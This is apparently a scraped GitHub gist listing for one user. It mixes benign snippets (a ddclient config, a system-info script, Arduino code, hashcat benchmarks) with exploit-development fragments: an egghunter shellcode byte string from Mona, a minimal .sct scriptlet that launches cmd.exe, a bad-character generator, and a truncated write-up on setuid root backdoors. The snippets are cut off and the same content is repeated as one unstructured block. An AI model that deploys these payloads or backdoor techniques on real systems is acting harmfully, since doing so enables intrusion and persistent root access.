dave5623

## ddclient.conf_googledomains_raspi.txt
# https://www.jgomez.net/google-dynamic-dns-with-raspberry-pi/

protocol=dyndns2
#use=if, if=wlan0
use=web, web=checkip.dyndns.org
ssl=yes
server=domains.google.com
login=googleloginhere
password=’googlepasswordhere’
subdomain.domain.tld

## Mona egghunter
Log data
Address    Message
0BADF00D   [+] Command used:
0BADF00D   !mona egg
0BADF00D   [+] Egg set to w00t
0BADF00D   [+] Generating traditional 32bit egghunter code
0BADF00D   [+] Preparing output file 'egghunter.txt'
0BADF00D       - (Re)setting logfile egghunter.txt
0BADF00D   [+] Egghunter  (32 bytes):
           "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"

## Sysinfo.sh
#!/bin/bash
# You Will need to install istats
# gem install istats

echo && echo ———————-System Information:——————— &&
/bin/echo -n "Uptime: " && uptime | awk '{print $3}'
echo
/bin/echo -n "CPU Usage: "  && top -l 1 | awk '/CPU usage/ {print $3}'
/bin/echo -n "CPU Temp: "  && istats | grep CPU\ temp | awk '{print $3}'
/bin/echo -n "FAN Speed: "  && istats | grep Fan\ 0\ speed: | awk '{print $4,$5}'

## Backdoor-Minimalist.sct
<?XML version="1.0"?>
<scriptlet>
<registration
    progid="Empire"
    classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
	<!-- Proof Of Concept - Casey Smith @subTee -->
	<script language="JScript">
		<![CDATA[

			var r = new ActiveXObject("WScript.Shell").Run("cmd.exe");

## sled.py
string = ''
for i in range (0,256):
    string += "\\x" + "{:02X}".format(i)

print string

## setuid-root-backdoor.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                dave5623
                / setuid-root-backdoor.md
            
            
              Created
              February 15, 2016 19:02
                — forked from dergachev/setuid-root-backdoor.md
            
              
                How to use setuid to install a root backdoor. 
              
          
    Why You Can't Un-Root a Compromised Machine

Let's say somebody temporarily got root access to your system, whether because you "temporarily" gave them sudo rights, they guessed your password, or any other way. Even if you can disable their original method of accessing root, there's an infinite number of dirty tricks they can use to easily get it back in the future.
While the obvious tricks are easy to spot, like adding an entry to /root/.ssh/authorized_keys, or creating a new user, potentially via running malware, or via a cron job. I recently came across a rather subtle one that doesn't require changing any code, but instead exploits a standard feature of Linux user permissions system called setuid  to subtly allow them to execute a root shell from any user account from the system (including www-data, which you might not even know if compromised).
If the "setuid bit" (or flag, or permission mode) is set for executable, the operating system will run not as the cur

  
## Amazon EC2 NVIDIA GRID K520 oclHashcat Benchmarks
cudaHashcat v1.36 starting in benchmark-mode...

Device #1: GRID K520, 4095MB, 797Mhz, 8MCU

Hashtype: MD4
Workload: 1024 loops, 256 accel

Speed.GPU.#1.:  3989.1 MH/s

Hashtype: MD5

## Kali VM Hashcat Benchmark
Initializing hashcat v0.49 with 1 threads and 32mb segment-size...

Device...........: Intel(R) Core(TM) i7 CPU       M 620  @ 2.67GHz
Instruction set..: x86_32
Number of threads: 1

Hash type: MD4
Speed/sec: 6.77M words

Hash type: MD5

## gist:af40125de369e7e71f3f
[0x12 0x68 0xAA 0x10 0x01]

## gist:fcf0793ad5a850799371
#include <Wire.h>

int toggle = 0;

void setup()
{
  Wire.begin();
}

void loop()
	# https://www.jgomez.net/google-dynamic-dns-with-raspberry-pi/

	protocol=dyndns2
	#use=if, if=wlan0
	use=web, web=checkip.dyndns.org
	ssl=yes
	server=domains.google.com
	login=googleloginhere
	password=’googlepasswordhere’
	subdomain.domain.tld
	Log data
	Address Message
	0BADF00D [+] Command used:
	0BADF00D !mona egg
	0BADF00D [+] Egg set to w00t
	0BADF00D [+] Generating traditional 32bit egghunter code
	0BADF00D [+] Preparing output file 'egghunter.txt'
	0BADF00D - (Re)setting logfile egghunter.txt
	0BADF00D [+] Egghunter (32 bytes):
	"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
	#!/bin/bash
	# You Will need to install istats
	# gem install istats

	echo && echo ———————-System Information:——————— &&
	/bin/echo -n "Uptime: " && uptime \| awk '{print $3}'
	echo
	/bin/echo -n "CPU Usage: " && top -l 1 \| awk '/CPU usage/ {print $3}'
	/bin/echo -n "CPU Temp: " && istats \| grep CPU\ temp \| awk '{print $3}'
	/bin/echo -n "FAN Speed: " && istats \| grep Fan\ 0\ speed: \| awk '{print $4,$5}'
	<?XML version="1.0"?>
	<scriptlet>
	<registration
	progid="Empire"
	classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
	<!-- Proof Of Concept - Casey Smith @subTee -->
	<script language="JScript">
	<![CDATA[

	var r = new ActiveXObject("WScript.Shell").Run("cmd.exe");
	string = ''
	for i in range (0,256):
	string += "\\x" + "{:02X}".format(i)

	print string
	cudaHashcat v1.36 starting in benchmark-mode...

	Device #1: GRID K520, 4095MB, 797Mhz, 8MCU

	Hashtype: MD4
	Workload: 1024 loops, 256 accel

	Speed.GPU.#1.: 3989.1 MH/s

	Hashtype: MD5
	Initializing hashcat v0.49 with 1 threads and 32mb segment-size...

	Device...........: Intel(R) Core(TM) i7 CPU M 620 @ 2.67GHz
	Instruction set..: x86_32
	Number of threads: 1

	Hash type: MD4
	Speed/sec: 6.77M words

	Hash type: MD5
	#include <Wire.h>

	int toggle = 0;

	void setup()
	{
	Wire.begin();
	}

	void loop()